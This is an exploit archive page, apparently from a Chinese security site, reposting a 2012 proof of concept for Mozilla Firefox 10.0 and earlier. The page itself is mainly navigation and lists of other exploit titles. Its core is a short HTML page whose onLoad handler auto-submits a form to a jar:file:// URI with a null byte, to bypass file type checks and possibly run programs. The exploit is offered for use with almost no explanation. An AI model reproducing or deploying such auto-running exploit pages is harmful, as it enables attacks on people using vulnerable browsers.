首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 mozilla firefox <= 10.0 local null byte bypass file check execution exploit 来源：todor.donev@@gmail.com 作者：Donev 发布时间：2012-02-09   <!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit --> <!-- --> <!-- Vuln risk level: Medium --> <!-- Author: Todor Donev --> <!-- Author mail: todor.donev@@gmail.com --> <!-- --> <!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: --> <!-- URI with a dangerous extension.--> <!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more   --> <!-- --> <!-- Simple exploit for mozilla firefox 10.0, tested on Windows XP SP3 EN --> <!-- --> <!-- Greetz Tsvetelina Emirska again.. =) --> <!-- --> <html> <body onLoad=javascript:document.form.submit()> <form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html"; method="GET" name="form"> </form> </body> </html> <!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·TORCS <= 1.3.2 xml buffer over ·SciTools Understand 2.6 DLL Lo ·linux/x86 sys_execve("/sb ·PeerBlock 1.1 BSOD ·Quartzo InterApp Control 3.22 ·Sysax Multi Server <= 5.52 Fil ·os-x/x86 bind backdoor tcp por ·Typsoft FTP Server 1.10 Multip ·Citrix Provisioning Services 5 ·Microsoft Internet Explorer 8 ·Adobe Flash Player MP4 Sequenc ·PDF Viewer Component ActiveX D   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved